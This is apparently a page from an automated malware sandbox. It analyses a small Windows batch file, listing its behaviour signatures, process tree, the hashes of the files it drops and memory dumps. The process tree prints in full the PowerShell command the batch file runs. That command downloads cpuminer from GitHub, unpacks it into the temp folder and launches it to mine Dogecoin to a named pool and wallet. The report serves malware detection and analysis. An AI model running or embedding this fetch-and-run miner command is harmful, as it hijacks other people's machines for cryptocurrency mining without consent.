b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1804s
max time network
1805s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
04/02/2024, 14:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	1452	powershell.exe
11	1452	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2208	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2208	cpuminer-sse2.exe
2208	cpuminer-sse2.exe
2208	cpuminer-sse2.exe
2208	cpuminer-sse2.exe
2208	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1452	powershell.exe
1452	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1452	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1088 wrote to memory of 1452	1088	cmd.exe	85
PID 1088 wrote to memory of 1452	1088	cmd.exe	85
PID 1452 wrote to memory of 2320	1452	powershell.exe	94
PID 1452 wrote to memory of 2320	1452	powershell.exe	94
PID 2320 wrote to memory of 2208	2320	cmd.exe	96
PID 2320 wrote to memory of 2208	2320	cmd.exe	96

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1452
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2320
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2208

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ai2vvf5y.b1p.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.3MB

MD5
3033c0796693331482e14cb60d774bb3

SHA1
0803ff8d1b2e645caa31aad9d52b581dde3b662e

SHA256
ac1c8919860b3f25046c404ff1473138ae75e2456fb1ed1068d1433c83fb3b52

SHA512
08521c3cf27cea5693d0650ced3db329935a60765ae3e7e69083c51450bc92b863e67dd8a0ca0838ed66824d12f6ac0736ee449ca47d1a27438fc5d308434934

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.0MB

MD5
23013a1d6aec34cec3715aa21ad12c2c

SHA1
0d1fe37f38e90df5e55127d05527dfadcf6a7f38

SHA256
c89f9ee833f8d0bc1fc97f97a7fa31d5500015873c00bfa3b46dda2a11282982

SHA512
e756bee448c5d057edc9528e146447b69121faad8f9e81c724406d0d5217676c996fa85ea594f0bf4bf2139d80df6d4a5c920f47402c0f1de9bd6a382aa8792c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
1.0MB

MD5
4d0b387efead326cecbbf9b8e7bfa233

SHA1
213dc674753f64acc66ac9dd2871601b8f065d92

SHA256
2de972da0be6b1e73268a2dc2acbef2f0fb3b5795db700f612768ddb603cc3b4

SHA512
b7265199887788964ebc5a7a3996bace065729024b452b71448a46e39e5defa7798b0bc5124350114ce1e03d9726a198e9781fdc5d3d23ad35ca26a1717ced53

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
907KB

MD5
e5d2262381313c3fec8cfc715ffc4c4e

SHA1
784953cd74b85a549782302104149ac68acbf06f

SHA256
595b9b6d82370049b725fb5c9c5732cd7447d2f5a318e7ba212d4b7b1350e2b7

SHA512
50cc42661b4a704ec607ea70dcf181e99c54ba114a662423c9476ede9bdf51652f27a32520335c5af13d44a6d6110590680bc07def9ddd320fa8046231ff3a97

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.2MB

MD5
fc30e16d0995aa45de46b75769a81744

SHA1
b30a13b50db7746c43a229372dd9d8a47734e369

SHA256
2b946e69bd7510b351c09f2b99046f6ccef1dcc3c040f2b65295647274985a52

SHA512
caeb905f60916dc1ce50d4470ea75d12ac0a37f5d22c07df0527a1c7914caa2b08fee3344ee86d49c5a177b0880f4cd5c18ca4b7145bce33e3a87d2378586977

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.2MB

MD5
0c351a4bef54f09e6cb5b6bfa146cbbe

SHA1
eca69af446924fe66bca72cfbac9b32e3de034a4

SHA256
bd750541ca607236ef62d8b33aae43da7daf8d261dca443a102ccb67c49f0f12

SHA512
64f00d24687e98b047c55f849b90c0b7cdf327041c7810501cb3886a3498c6cf23fc3bbf6a94281e57a7d2f637aadcb3bff2a5f8386611707fa3a8b132a2a84b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.0MB

MD5
e44648aafcbac295b6c28234d05ae29c

SHA1
999d508032d9b473bbb6a6acc2c89d9beb0c587c

SHA256
a15e54a190cc139847a4afd8beff7430e85be9659dc254e320ce0e50bbb16089

SHA512
b0f65b86785665d578ac6e49eddb8ccf27dac618857a57db3b0c56523c2e8c5439aafeaf7d3a91726f731d0e4f56826e821509d6296f9521f68899d3f3fb89d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1452-16-0x00000167460F0000-0x0000016746102000-memory.dmp

Filesize
72KB

Download
memory/1452-55-0x00007FF82A0C0000-0x00007FF82AB81000-memory.dmp

Filesize
10.8MB

Download
memory/1452-17-0x000001672DF70000-0x000001672DF7A000-memory.dmp

Filesize
40KB

Download
memory/1452-14-0x0000016746110000-0x0000016746120000-memory.dmp

Filesize
64KB

Download
memory/1452-13-0x00007FF82A0C0000-0x00007FF82AB81000-memory.dmp

Filesize
10.8MB

Download
memory/1452-12-0x0000016746110000-0x0000016746120000-memory.dmp

Filesize
64KB

Download
memory/1452-11-0x0000016746110000-0x0000016746120000-memory.dmp

Filesize
64KB

Download
memory/1452-10-0x00007FF82A0C0000-0x00007FF82AB81000-memory.dmp

Filesize
10.8MB

Download
memory/1452-9-0x000001672DF30000-0x000001672DF52000-memory.dmp

Filesize
136KB

Download
memory/2208-70-0x00000000654A0000-0x0000000065538000-memory.dmp

Filesize
608KB

Download
memory/2208-88-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2208-68-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2208-71-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2208-72-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2208-73-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2208-78-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2208-69-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2208-93-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2208-98-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2208-103-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2208-113-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2208-123-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2208-128-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download